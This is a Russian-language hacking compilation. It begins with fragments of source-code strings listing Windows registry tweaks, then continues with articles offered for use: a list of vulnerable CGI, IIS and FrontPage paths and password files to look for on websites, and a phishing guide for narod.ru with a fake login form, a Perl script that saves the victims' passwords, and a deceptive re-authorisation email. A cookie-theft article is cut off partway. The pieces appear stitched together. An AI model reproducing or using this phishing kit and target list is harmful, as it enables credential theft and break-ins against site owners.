REG_SZ' '' '' '----------------------------------------------------------------' + '----------------' '' 'Изменение расположения файлов почты и новостей Outlook Express' 'Если Вы установили Windows на отдельном диске, и хотите, чтобы н' + 'а этот диск не производилась запись ' 'ненужных файлов, Вы можете изменить расположение файлов почты и ' + 'новостей, сохраняемых Outlook' 'Express на другой диск.' 'Установите значение ключа равным новому пути размещения папок Ou' + 'tlook: ' '[HKEY_CURRENT_USER\Software\Microsoft\Outlook Express\Store Root' + ']. Не забудьте переместить папки "Mail" ' 'и "News" из старого места в новое.' 'Ключ: [Мой компьютер]' 'Параметр: HKEY_CURRENT_USER\Software\Microsoft\Outlook Express' 'Тип: REG_SZ' '' '----------------------------------------------------------------' + '----------------' '' 'Скрытие значка Internet Explorer' 'Этот параметр скрывает значок "Internet Explorer" на Рабочем сто' + 'ле Windows.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoInternetIcon' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Остановка сообщения об ошибках при загрузке' 'Останавливает раздражающие сообщения Windows, уведомляющие Вас, ' + 'что устройство не функционирует ' 'при загрузке Windows NT.' 'Создайте параметр '#39'NoPopupsOnBoot'#39' типа REG_DWORD в ключе указан' + 'ном ниже (если он еще не ' 'существует). Установите его значение равным '#39'1'#39' для отключения п' + 'оявления всплывающих сообщений.' 'Ключ: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windo' + 'ws]' 'Параметр: NoPopupsOnBoot' 'Тип: REG_DWORD' 'Значение: 1 = отключено' '' '----------------------------------------------------------------' + '----------------' '' 'Изменение заголовка окна Internet Explorer' 'Используя этот ключ, Вы можете изменить заданный по умолчанию за' + 'головок окна "Microsoft Internet ' 'Explorer", на что ни будь вроде "Окно просмотра Internet Андрея ' + 'Зенченко".' 'Используя RegEdit, откройте ключ "HKEY_LOCAL_MACHINE\SOFTWARE\Mi' + 'crosoft\Internet Explorer\Main" ' 'создайте в нем новый строковый параметр под названием "Window Ti' + 'tle", установите его значение равным ' 'строке которую Вы хотели бы видеть в области заголовка. Для сбро' + 'са к значению по умолчанию, удалите' 'параметр "Window Title".' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\M' + 'ain]' 'Параметр: Window Title' 'Тип: REG_SZ' '' '----------------------------------------------------------------' + '----------------' '' 'Задержка при открытии рабочей станции (Windows NT)' 'Иногда происходит значительная задержка при входе пользователя и' + 'ли администратора в рабочую' 'станцию. ' 'Это происходит потому что, когда Вы открываете рабочую станцию, ' + 'Windows NT модифицирует список ' 'доменов, если время кэширования списка превышает две минуты (по ' + 'умолчанию). Этот временной предел ' 'может быть изменен.' '1. Откройте системный реестр, найдите ключ и параметр указанные ' + 'ниже, если они не существуют, то ' 'создайте их.' '2. Установите значение параметра '#39'DcacheMinInterval'#39' равным коли' + 'честву секунд блокировки кэша.' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV' + 'ersion\Winlogon]' 'Параметр: DcacheMinInterval' 'Тип: REG_DWORD' 'Значение: 120-86400 (десятичное число) (выраженное в секундах)' '' '----------------------------------------------------------------' + '----------------' '' 'Желтый значок '#39'!'#39' на PCMCIA сетевом адаптере (Windows 9x)' 'При использовании PCMCIA сетевого адаптера под Windows 98 Вы не ' + 'смогли подключить компьютер к сети, ' 'и ' 'в Панели управления > Система появляется желтый значок восклицат' + 'ельного знака рядом с именем платы.' '1. Нажмите на Пуск>Выполнить...>' '2. Напечатайте "REGEDIT", и нажмите OK' '3. Перейдите в ключ [HKEY_LOCAL_MACHINE\System\CurrentControlSet' + '\Services\VxD\VCOMM]' '4. Дважды щелкните на параметре '#39'EnablePowerManagement'#39', установ' + 'ите его значение равным '#39'0'#39', ' 'основываясь на следующем:' '· если текущее значение '#39'0000 01 00 00 00'#39', изменение его на '#39'00' + '00 00 00 00 00'#39' (Полная версия).' '· если текущее значение '#39'0x00000001 (1)'#39', измените его на '#39'0x000' + '00000 (0)'#39' (Обновленная версия)' '5. Закройте Редактор системного реестра' '6. Перезагрузите Windows' 'Ключ: [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\' + 'VCOMM]' 'Параметр: EnablePowerManagement' 'Значение: (0=отключено, 1=включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Изменение заданного по умолчанию состояния клавиши NUMLOCK (Wind' + 'ows NT)' 'Клавиша NUMLOCK обычно включается прежде, чем пользователь загру' + 'зит компьютер, это может ' 'причинить' 'неудобства для людей с портативными компьютерами, которые не про' + 'веряют состояние клавиши NUMLOCK ' 'перед введением пароля. Заданное по умолчанию поведение может бы' + 'ть изменено с помощью этой ' 'установки.' '1. Откройте Ваш системный реестр, и найдите ключ указанный ниже.' '2. Установите значение параметра '#39'InitialKeyboardIndicators'#39' рав' + 'ным '#39'0'#39' для отключения, или равным '#39'2'#39' для ' 'включения.' 'Обратите внимание: Это изменение затронет всех пользователей, но' + ' значение может быть изменено только ' 'для текущего пользователя, таким же изменением ключа [HKEY_CURRE' + 'NT_USER\Control Panel\Keyboard].' 'Ключ: [HKEY_USERS\.DEFAULT\Control Panel\Keyboard]' 'Параметр: InitialKeyboardIndicators' 'Тип: REG_SZ' 'Значение: 0 = NUMLOCK отключена, 2 = NUMLOCK включена' '' '----------------------------------------------------------------' + '----------------' '' 'Удаление программ перечисленных в блоке "Установка/Удаление прог' + 'рамм" (Windows 9x и NT)' 'Все Windows 9x или NT совместимые программы должны включать прог' + 'рамму Uninstall, иногда программа ' 'может удалиться, но запись в блоке "Установка/Удаление программ"' + ' остается. В этом ключе, Вы можете' 'удалить ненужные записи.' 'Используя Regedit ,откройте ключ указанный ниже. Под этим ключом' + ' будет ряд подключей, каждый из ' 'которых представляет установленную программу.' 'Чтобы увидеть какую программу, каждый из подключей представляет,' + ' откройте его и там должно быть, по ' 'крайней мере, два параметра '#39'DisplayName'#39' и '#39'UninstallString'#39'. '#39 + 'DisplayName'#39' это название, используемое в ' 'списке программ "Установка/Удаление", а '#39'UninstallString'#39' это пр' + 'ограмма, используемая для деинсталляции ' 'вышеназванной программы.' 'Чтобы удалить программу из списка, Вы можете просто удалить подк' + 'люч, представляющий эту программу.' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVers' + 'ion\Uninstall]' '' '----------------------------------------------------------------' + '----------------' '' 'Обеспечение сетевого доступа к дискам CD-ROM (Windows NT)' 'Этот параметр определяет, являются ли данные на диске CD-ROM дос' + 'тупными для других пользователей. ' 'Он ' 'частично удовлетворяет требованиям защиты C2 для сменных средств' + '.' 'Диск CD-ROM по умолчанию предназначен для совместного использова' + 'ния в сети. Если значение этого ' 'параметра равно '#39'1'#39', то только текущий пользователь сможет обрат' + 'иться к диску CD-ROM. Это не позволит' 'администраторам и удаленным пользователям (и даже пользователям ' + 'одной рабочей станции) получить ' 'доступ к диску, во время использования текущим пользователем ком' + 'пьютера. Диск снова станет ' 'доступным, когда текущий пользователь выйдет из компьютера.' 'Значения параметра:' '· '#39'0'#39' = к компакт-дискам могут обращаться все администраторы в д' + 'омене.' '· '#39'1'#39' = к компакт-дискам в может обращаться только текущий польз' + 'ователь вошедший в компьютер.' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV' + 'ersion\Winlogon]' 'Параметр: AllocateCDRoms' 'Тип: REG_SZ' 'Значение: (0 = включено, 1 = отключено)' '' '----------------------------------------------------------------' + '----------------' '' 'Обеспечение сетевого доступа к дисководам для гибких дискет (Win' + 'dows NT)' 'Этот параметр определяет, являются ли данные на гибком диске дос' + 'тупными для других пользователей. ' 'Он ' 'частично удовлетворяет требованиям защиты C2 для сменных средств' + '.' 'Гибкие диски по умолчанию предназначены для совместного использо' + 'вания в сети. Если значение этого' 'параметра равно '#39'1'#39', то только текущий пользователь сможет обращ' + 'аттиться к гибким дискам. Это не ' 'позволит администраторам и удаленным пользователям (и даже польз' + 'ователям одной рабочей станции) ' 'получить доступ к дискам, во время использования текущим пользов' + 'ателем компьютера. Диски снова ' 'станут доступным, когда текущий пользователь выйдет из компьютер' + 'а.' 'Значения параметра:' '· '#39'0'#39' = к гибким дискам могут обращаться все администраторы в до' + 'мене.' '· '#39'1'#39' = к гибким дискам может обращаться только текущий пользова' + 'тель вошедший в компьютер.' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV' + 'ersion\Winlogon]' 'Параметр: AllocateFloppies' 'Тип: REG_SZ' 'Значение: (0 = включено, 1 = отключено)' '' '----------------------------------------------------------------' + '----------------' '' 'Требование алфавитно-цифрового пароля Windows (Windows 9x и NT)' 'Windows по умолчанию принимает любой пароль, кроме пустого. Этот' + ' параметр определяет, будет ли ' 'Windows ' 'требовать алфавитно-цифровой пароль, то есть пароль, созданный и' + 'з комбинации букв (A, B, C. ..) и чисел' '(1, ' '2, 3 ...).Ключ: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\C' + 'urrentVersion\Policies\Network]' 'Параметр: AlphanumPwds' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Управление автоматической перезагрузкой оболочки (Windows NT)' 'По умолчанию, если в интерфейсе пользователя Windows NT или в од' + 'ном из его компонентов происходит ' 'сбой, интерфейс перезагружается автоматически. Эта установка мож' + 'ет быть изменена так, чтобы Вы ' 'проделывали эту операцию вручную.' 'Ключ: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentV' + 'ersion\Winlogon]' 'Параметр: AutoRestartShell' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1 = включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Блокировка кэширования пароля (Windows 9x и NT)' 'Для дополнительной автоматизации Windows кэширует копию пароля п' + 'ользователей в локальной системе. ' 'Это ведет к угрозе защиты на некоторых системах. При отключении ' + 'кэширующего средства, пароль ' 'пользователя не запоминается на его компьютере. Включение этого ' + 'параметра также удаляет повторное ' 'поле ввода пароля Windows, и отключает возможность синхронизации' + ' сетевых паролей.' 'Ключ: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVers' + 'ion\Policies\Network]' 'Параметр: DisablePwdCaching' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1=включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение Редактора системного реестра (Windows 9x и NT)' 'Этот параметр не позволит пользователю запустить Regedit.exe или' + ' Regedt32.exe для изменения системного ' 'реестра.' 'Предупреждение: Будьте внимательны при изменении этого параметра' + ', и удостоверитесь, что Вы не ' 'блокируете свой системный реестр.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\System]' 'Параметр: DisableRegistryTools' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1=включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Отключение Администратора задач (Windows NT)' 'Включает или отключает способность пользователя запускать Админи' + 'стратор задач, для наблюдения за' 'процессами, выполнением программ, а так же созданием изменений в' + ' приоритете или в состоянии ' 'индивидуальных процессов. (Этот параметр была добавлен в Сервисн' + 'ом пакете 2.)' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\System]' 'Параметр: DisableTaskMgr' 'Тип: REG_DWORD' 'Значение: (0 = отключено, 1=включено)' '' '----------------------------------------------------------------' + '----------------' '' 'Управление свойством Автозапуска (Windows 9x и NT)' 'Определяет, включено ли свойство Автозапуска на любом из дисков,' + ' связанном с системой. Когда средства ' 'Автозапуска присутствуют на диске, то они срабатывают, при разре' + 'шенном свойстве Автозапуска.' 'Этот параметр содержит 32 бита. Нижние 26 битов представляют каж' + 'дый диск, исходя из того, что самый ' 'нижний бит, представляет диск A, а 26-ой бит, представляет диск ' + 'Z. Если бит равен 0, свойство ' 'автозапуска, ' 'включено на этом диске. Если бит равен 1, свойство автозапуска з' + 'аблокировано на этом диске.' 'Например, если значение этого параметра равно 0x8 (двоичное 1000' + '), автозапуск заблокирован на диске D. ' 'Обратите внимание, что значение 1 в бите, представляющем CD ROM,' + ' имеет приоритет над значением' 'параметра Autorun.' 'Ключ: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersi' + 'on\Policies\Explorer]' 'Параметр: NoDriveTypeAutoRun' 'Тип: REG_DWORD' '' '----------------------------------------------------------------' + '----------------' '' 'Предотвращение запуска основного хранителя экрана (Windows NT)' 'Windows NT имеет заданный по умолчанию хранитель экрана login.sc' + 'r, который запускается, даже если' 'хранитель экрана не был выбран. Это может создать угрозу защите,' + ' поскольку позволяет локальному ' 'пользователю заменить login.scr другой программой, связанной с с' + 'истемными привилегиями.' '1. Измените значение параметра '#39'ScreenSaveActive'#39' на '#39'0'#39', чтобы ' + 'отключить хранитель экрана.' '2. Выйдите из Regedit и перезагрузитесь.' 'Обратите внимание: Может использоваться альтернативный хранитель' + ' экрана. Ели Вы не используете ' 'отключение, измените значение '#39'SCRNSAVE.EXE'#39' в том же ключе, на ' + 'значение равное полному пути к ' 'хранителю экрана, который Вы желаете использовать. Что бы измене' + 'ния вступили в силу, требуется ' 'перезагрузка.' 'Ключ: [HKEY_USERS\.DEFAULT\Control Panel\Desktop]' 'Параметр: ScreenSaveActive' 'Тип: REG_SZ' 'Значение: (0 = отключено, 1=включено)' '' '----------------------------------------------------------------' + '----------------' '&
  9. Ключевые слова для поиска уязвимых веб-страниц -------------------------------------------------------------------------------- 1. Что мы ищем? Одна из уязвимостей веб-сайтов это открытые директории. Многие администраторы часто забывают поменять настройки выставленные сервером по умолчанию. Такие ошибки в обычно приводят к дефейсу веб-страницы. 2. Что дают нам открытые директории? Например, через дериктории cgi-bin или scripts можно исполнить любой скрипт на удаленной машине. Через директорию _vti_bin (сайт под управление FrontPage), через утилиту shtml.exe можно просмотреть любой файл на диске. А, например, в директории vti_pvt содержатся все пароли доступа к FrontPage Extension (файл service.pwd). Рассшифровать полученные пароли я думаю труда не составит. 3. Где искать? Это самый простой вопрос. Набираем www.google.com или любой другой поисковик вводим нужную фразу и вперед, остаеться только пересмотреть результаты пойска . Иногда это не простая задача. Например на запрос /ets/passwd yahoo выдал 102000 результатов. Но думаю для настоящего хакера это не проблема. 4. Список. А вот наконец и сам список: /cgi-bin/axs.cgi /cgi-bin/bash /cgi-bin/bb-hist.sh /cgi-bin/bigconf.cgi /cgi-bin/bnbform /cgi-bin/bnbform.cgi /cgi-bin/cachemgr.cgi /cgi-bin/calendar /cgi-bin/campas /cgi-bin/carbo.dll /cgi-bin/cgimail.exe /cgi-bin/Cgitest.exe /cgi-bin/cgiwrap /cgi-bin/classified.cgi /cgi-bin/classifieds /cgi-bin/classifieds.cgi /cgi-bin/Count.cgi /cgi-bin/csh /cgi-bin/date /cgi-bin/day5datacopier.cgi /cgi-bin/day5notifier /cgi-bin/dbmlparser.exe /cgi-bin/download.cgi /cgi-bin/dumpenv.pl /cgi-bin/edit.pl /cgi-bin/environ.cgi /cgi-bin/excite /cgi-bin/faxsurvey /cgi-bin/faxsurvey /cgi-bin/filemail /cgi-bin/filemail.pl /cgi-bin/files.pl /cgi-bin/finger /cgi-bin/finger.cgi /cgi-bin/finger.pl /cgi-bin/flexform /cgi-bin/flexform.cgi /cgi-bin/FormHandler.cgi /cgi-bin/formmail.pl /cgi-bin/fortune /cgi-bin/fpexplorer.exe /cgi-bin/get32.exe\|dir /cgi-bin/glimpse /cgi-bin/guestbook.cgi /cgi-bin/guestbook.pl /cgi-bin/GW5 /cgi-bin/GWWEB.EXE /cgi-bin/handler /cgi-bin/handler.cgi /cgi-bin/htmlscript /cgi-bin/htmlscript /cgi-bin/info2www /cgi-bin/input.bat /cgi-bin/input2.bat /cgi-bin/jj /cgi-bin/ksh /cgi-bin/lwgate /cgi-bin/LWGate.cgi /cgi-bin/lwgate.cgi /cgi-bin/MachineInfo /cgi-bin/mail /cgi-bin/maillist.pl /cgi-bin/man.sh /cgi-bin/mlog.phtml /cgi-bin/mylog.phtml /cgi-bin/nlog-smb.pl /cgi-bin/nph-error.pl /cgi-bin/nph-publish /cgi-bin/nph-test-cgi /cgi-bin/passwd /cgi-bin/passwd.txt /cgi-bin/password /cgi-bin/password.txt /cgi-bin/perl /cgi-bin/perl.exe /cgi-bin/perlshop.cgi /cgi-bin/pfdispaly.cgi /cgi-bin/phf /cgi-bin/phf.pp /cgi-bin/php /cgi-bin/php.cgi /cgi-bin/phpscan /cgi-bin/post-query /cgi-bin/ppdscgi.exe /cgi-bin/query /cgi-bin/redirect /cgi-bin/responder.cgi /cgi-bin/rguest.exe /cgi-bin/rksh /cgi-bin/rsh /cgi-bin/rwwwshell.pl /cgi-bin/sam._ /cgi-bin/search.cgi /cgi-bin/search97.vts /cgi-bin/sendform.cgi /cgi-bin/sh /cgi-bin/snorkerz.bat /cgi-bin/snorkerz.cmd /cgi-bin/status.cgi /cgi-bin/survey /cgi-bin/survey.cgi /cgi-bin/tcsh /cgi-bin/test.bat /cgi-bin/test-cgi /cgi-bin/test-cgi.tcl /cgi-bin/test-env /cgi-bin/textcounter.pl /cgi-bin/tst.bat /cgi-bin/tst.bat\|dir /cgi-bin/unlg1.1 /cgi-bin/upload.pl /cgi-bin/uptime /cgi-bin/view-source /cgi-bin/visadmin.exe /cgi-bin/visitor.exe /cgi-bin/w3-msql /cgi-bin/w3-sql /cgi-bin/w3tvars.pm /cgi-bin/wais.pl /cgi-bin/webdist.cgi /cgi-bin/webgais /cgi-bin/webmap.cgi /cgi-bin/websendmail /cgi-bin/wguest.exe /cgi-bin/whois_raw.cgi /cgi-bin/wrap /cgi-bin/wwwadmin.pl /cgi-bin/wwwboard.pl /cgi-bin/www-sql /cgi-bin/zsh /cgi-dos/args.bat /cgi-dos/args.cmd /cgi-shl/win-c-sample.exe /cgi-win/uploader.exe /cool-logs/mlog.html /cool-logs/mylog.html /database.nsf /database.nsf /domcfg.nsf /domlog.nsf /hosts.dat /iisadmpwd/achg.htr /IISADMPWD/achg.htr /iisadmpwd/aexp.htr /iisadmpwd/aexp2.htr /iisadmpwd/aexp2b.htr /iisadmpwd/aexp3.htr /iisadmpwd/aexp4.htr /iisadmpwd/aexp4b.htr /iisadmpwd/anot.htr /iisadmpwd/anot3.htr /iissamples/exair/howitworks/codebrws.asp /iissamples/sdk/asp/docs/codebrws.asp /log.nsf /manage/cgi/cgiproc /msadc/msadcs.dll /msadc/samples/adctest.asp /msadc/Samples/SELECTOR/codebrws.cfm /msadc/Samples/SELECTOR/showcode.asp /msads/samples/selector/showcode.asp /names.nsf /names.nsf /passwd /passwd.txt /password /password.txt /publisher/ /samples/search/queryhit.htm /scripts/CGImail.exe /scripts/convert.bas /scripts/counter.exe /scripts/cpshost.dll /scripts/fpcount.exe /scripts/iisadmin/bdir.htr /scripts/iisadmin/ism.dll /scripts/iisadmin/tools/ctss.idc /scripts/iisadmin/tools/getdrvrs.exe /scripts/iisadmin/tools/mkilog.exe /scripts/issadmin/bdir.htr /scripts/perl /scripts/postinfo.asp /scripts/proxy/w3proxy.dll /scripts/samples/ctguestb.idc /scripts/samples/details.idc /scripts/samples/search/webhits.exe /scripts/tools/dsnform.exe /scripts/tools/getdrvrs.exe /scripts/tools/getdrvs.exe /scripts/tools/newdsn.exe /scripts/upload.asp /scripts/uploadn.asp /scripts/uploadx.asp /search /search97.vts /secure/.htaccess /secure/.wwwacl /session/adminlogin /showfile.asp /smdata.dat /ssi/envout.bat /today.nsf /tree.dat /WebSTAR /ws_ftp.ini /wwwboard/passwd.txt Удачной рыбалки
  10. Взлом на уровне карапуза (как сломать сайты на narod.ru и других бесплатных хостингах) -------------------------------------------------------------------------------- Вот сидел я и решил всё таки написать. Основа статьи это социальная инженерия, о которой уже было написано не мало. Не буду повторяться. Этот трюк можно провести со всеми новичками в сети Интернет. А рассматривать мы его будем уже на «банальном» хостинге narod.ru.(Повторюсь: его можно проделать на любом бесплатном хостинге, да даже и на платном моно попробовать Начнём для проведения нижеописанных действий вам понадобятся: 1. Мозги 2. Руки 3. Хостинг с поддержкой CGI 4. Небольшое знание HTML И так ищем жертву… У нас она будет xxx.narod.ru. Вообще для этого случая нужно искать не заброшенный сайт. И чтобы в контактах было мыло типа [email protected] Теперь нагло сдираем face народа Подправляем его, как надо, вставляем туда форму: <form action="write.cgi" method="post"> <input name="name" value=".narod.ru"><br> <input type="password" length="20" name="pass"><br> <input type="submit" value="подтвердить"> </form> Ещё надо написать write.cgi: &GetFormInput; $name=$field{'name'}; $pass=$field{'pass'}; sub GetFormInput { (*fval) = @_ if @_ ; local ($buf); if ($ENV{'REQUEST_METHOD'} eq 'POST') { read(STDIN,$buf,$ENV{'CONTENT_LENGTH'}); } else { $buf=$ENV{'QUERY_STRING'}; } if ($buf eq "") { return 0 ; } else { @fval=split(/&/,$buf); foreach $i (0 .. $#fval){ ($name,$val)=split (/=/,$fval[$i],2); $val=~tr/+/ /; $val=~ s/%(..)/pack("c",hex($1))/ge; $name=~tr/+/ /; $name=~ s/%(..)/pack("c",hex($1))/ge; if (!defined($field{$name})) { $field{$name}=$val; } else { $field{$name} .= ",$val"; } } } return 1; } open (OUTFILE, ">>pass.txt"); print OUTFILE "$name"; print OUTFILE "\n$pass"; print OUTFILE "\n=======END=======\n\n"; close (OUTFILE); print "Location: http://your_redirect_URL\n" ; Последняя строчка это перенаправление. Лучше послать на главную страницу народа. Всё наш сайт мы подготовили. Теперь пишем этому "карапузу" (прим. Eraser'a : телепузу =)) письмо с анонимного мыла от [email protected] вида: "Здравствуйте ваш сайт пытались взломать и вам срочно не позже чем через 96 часов надо пройти повторную авторизацию. Идите по ссылке(ага вот тута он и отдаст нам пароль) а ссылочка, то вы скажите видно будет, что не народовская... А я скажу вам нифига... А зачем нам nslookup? Вот так вот. короче ссылка будет вида: IP_ВАШЕГО_САЙТА/ sign.html . Усё готово.. теперь токо надо ждать . Дополнение: В доставание пароля вам поможет ваша фантазия при написание письма лопуху...
  11. Cookie: Зачем Cookie нужен? Взлом через Cookie -------------------------------------------------------------------------------- Зачем Cookie нужен? Дело в том, что HTTP-протокол - одноразовый, если так можно выразиться. Т.е. каждый раз заходя на страничку, пользователь начинает сначала, что бы он не вводил, и какие изменения бы не делал. Cookie помогает создать иллюзию, что пользователя помнят на сайте. Пользователю не нужно вводить сотню раз одну и ту же информацию от странички к страничке, и даже от сессии к сессии, она хранится у него на диске. К удобству можно отнести еще и то, что эту информацию пользователь всегда сможет сменить у себя на диске "на лету". В Cookie также могут храниться другие разнообразные данные. Например, количество посещений какой-то страницы, время посещений. С помощью cookie не составляет труда сделать маленький органайзер или корзину в виртуальном магазине. Cookie многие не любят из-за ее небезопасности. Многие аналитики говорят, что это не проблема, и ничего плохого с помощью данной технологии сделать нельзя. Я с этим глубоко не согласен, если кто-то может читать информацию из файла(ов) cookie, то это уже небезопасно. Приведу чисто теоретические примеры, которые, при желании, не трудно воплотить в реальность. 1. Допустим, пользователь зашел на почтовый сайт, заполнил форму с login'ом и паролем, которые записались в cookie, пускай даже через Secure Socket Level. Взломщик написал письмо пользователю в формате HTML с параметрами чтения cookie с паролями. Прочитав cookie, HTML-файл или запрашивает у пользователя разрешение отослать информацию взломщику, где пользователя можно обмануть ложной надписью а ля "Ошибки в сценариях Javascript!". Даже довольно опытный пользователь не задумываясь нажмет OK, после чего login и пароль отошлется взломщику. Или взломщик может добавить 0-ой фрейм, где будет временно содержаться информация из cookie, которая при ответе на письмо, будет вставляться в конец письма. Все это нетрудно сделать с помощью FORM и Javascript. 2. Пример с виртуальным магазином. Допустим, мы имеем гипотетический магазин shop.provider.com. Совершая покупки в данном магазине, пользователь хранит информацию в cookie. Параллельно или до захода в магазин, пользователь зашел на гипотетическую страницу взломщика hacker.provider.com, где изменялись настройки cookie виртуального магазина. Взломщик может изменить количество покупок, имя, адрес, и все то, что хранится в данном cookie. Я думаю, вам бы не понравилось, если к вашим покупкам прибавили пару мониторов или отвезли ваши покупки не тому пользователю. Сделать это довольно просто, если иметь страничку в домене магазина второго или третьего уровня. Примеры:. Итак, для пользователя технология cookie представляет собой несколько файлов в папке %WINDOWS%\Cookies (по умолчанию в Internet Explorer), либо всего один файл cookie.txt (если это Netscape Navigator и другие броузеры). Сайты периодически добавляют информацию в cookie и ее же забирают. Естественно, в спецификациях Cookie предусмотрены некоторые элементы защиты. Всего Cookies может быть не больше 300. Каждый Cookie не может быть больше 4kb. С одного домена второго уровня (плюс подуровни) не может быть получено больше 20 Cookies. Информация из Cookie одного домена второго уровня (плюс подуровни) не может быть прочитана другими доменами. Если документ кэшируется, то информация о cookie не кэшируется. Информация в\из Cookie может передавать с помощью протокола SSL. Если лимит исчерпывается, первые записи удаляются. Если Cookie становится больше 4kb, первые байты вырезаются. Формат Cookie. Полную спецификацию на английском можно найти на http://www.netscape.com/newsref/std/cookie_spec.html. В моей статье только сокращенное описание. Информация в Cookie задается принципом ИМЯ=ЗНАЧЕНИЕ. В одном документе может содержаться несколько Cookies (не больше 20). Минимальное описание поля Cookie выглядит так: Set-Cookie: NAME=VALUE; Максимальное выглядит так: Set-Cookie: NAME=VALUE; expires=DATE; path=PATH; domain=DOMAIN_NAME; secure NAME=VALUE - NAME - Имя Cookie, VALUE - Значение. Можно менять как NAME, так и VALUE. Используются любые символы, кроме символа переноса строки, двоеточия, запятой и пробела. Пример: Имя=Вася expires=DATE - Дата окончания действия Cookie. Менять только DATE. Вид такой: "expires=День, Число-Ден-ГГГГ ЧЧ:ММ:СС GMT". Если expires не обозначен, Cookie хранится до закрытия окна броузера. Пример: expires=Fri, 14-Sep-2005 13:13:13 GMT domain=DOMAIN_NAME - домен на котором действителен Cookie. Вид такой: "domain=domain.com". Cookie будет действителен как для www.domain.com, так и для myname.domain.com. В зоне RU и других локальных зонах не работает. Используется только для COM, EDU, NET, ORG, GOV, MIL и INT. Если domain не обозначен, используется доменное имя сервера с Cookie. Пример1: domain=mamapapa.com Пример2: domain=gazzzeta.da.ru path=PATH - Указывает имена докментов, для которых действительно значение Cookie. Вид такой: "path=/word". Cookie будет отсылаться в директориях /word, /word2000 и файлов в текущей директории с именами word.htm, wordchampion.html. Для применения Cookie ко всему серверу указывается корневой каталог сервера /. Если path не указан, Cookie распространяется только на текущую директорию. Пример1: path=/gazzzeta Пример2: path=/ secure - Если указан, при передаче Cookie используется HTTPS (HTTP с SSL - Secure Socket Level). Если secure не указан, Cookie передается HTTP. Если Cookie использует одинаковое значение NAME, domain и path - старое значение заменяется новым. Вставка Cookie в HTML. Вставить Cookie можно несколькими способами. Самые простой - это через META-тег. Альтернативным способом является Javascript и всевозможные другие технологии (CGI, PHP, SSI и т.д.). Рассматривать CGI, PHP, SSI и прочие мы не будем, т.к. это требует от вашего домена, где располагается страница, возможности использования этих технологий, что бывает не всегда. Использование Cookie через META-тег. Между тегов HEAD Cookie вписывается так: <META HTTP-EQUIV="Set-Cookie" CONTENT="NAME=VALUE; expires=DATE; domain=DOMAIN_NAME; path=PATH; secure"> Можно использовать несколь META-тегов с Cookie в одном документе. Пример: <META HTTP-EQUIV="Set-Cookie" CONTENT="Имя=Вася; expires=Fri, 14-Sep-2005 13:13:13 GMT; path=/; domain=provider.com; secure"> Использование Cookie через Javascript. Использование Cookie с помощью Javascript является самым популярным способом, т.к. это довольно просто для разработчика, не требует от сервера определенного программного обеспечения и может использовать динамичные данные, генерируемые внутренним Javasript-скриптом, либо вводимые пользователем. Вот примера скрипта Javascript, используещего Cookie. Скрипт не мой, но он точно описывает те возможности, о которых мы говорим. К сожалению, автора скрипта я не знаю поэтому указать не могу. <script language="JavaScript"> <!-- var username = GetCookie('username'); if (username == null) { username = prompt(' Пожалуйста, введите Ваше им\я\n (в противном случае нажмите cancel)',""); if (username == null) { alert('Ну хорошо, тогда я буду звать Вас ВебСёрфером'); username = 'ВебСёрфер'; } else { pathname = location.pathname; myDomain = pathname.substring(0,pathname.lastIndexOf('/')) +'/'; // Установка параметра expire на год вперед. var largeExpDate = new Date (); largeExpDate.setTime(largeExpDate.getTime() + (365 * 24 * 3600 * 1000)); SetCookie('username',username,largeExpDate,myDomain); } } function getCookieVal (offset) { var endstr = document.cookie.indexOf (";", offset); if (endstr == -1) endstr = document.cookie.length; return unescape(document.cookie.substring(offset, endstr)); } function GetCookie (name) { var arg = name + "="; var alen = arg.length; var clen = document.cookie.length; var i = 0; while (i < clen) { var j = i + alen; if (document.cookie.substring(i, j) == arg) return getCookieVal (j); i = document.cookie.indexOf(" ", i) + 1; if (i == 0) break; } return null; } function SetCookie (name, value) { var argv = SetCookie.arguments; var argc = SetCookie.arguments.length; var expires = (argc > 2) ? argv[2] : null; var path = (argc > 3) ? argv[3] : null; var domain = (argc > 4) ? argv[4] : null; var secure = (argc > 5) ? argv[5] : false; document.cookie = name + "=" + escape (value) + ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) + ((path == null) ? "" : ("; path=" + path)) + ((domain == null) ? "" : ("; domain=" + domain)) + ((secure == true) ? "; secure"; : ""); } document.write('<p align=center>Здравствуйте, ' + username + '</p>'); // --></SCRIPT> Останавливаться на данном скрипте смысла нет, статья о Cookie, а не о Javascript. Как видите, технология Cookie предоставляет огромные возможности для разработчиков сайтов. Cookie поддерживается всеми более или менее известными броузерами, такими как Netscape Navigator, Microsoft Internet Explorer, Mosaic, Opera и другими, начиная с самых первых версий. Взлом через Cookie А зачем мне все это надо? Технология cookie используется при заполнении полей, хранения информации, для виртуальных корзин в Интернет-магазинах, в баннерных сетях и много чего еще. Но также эта технология используется 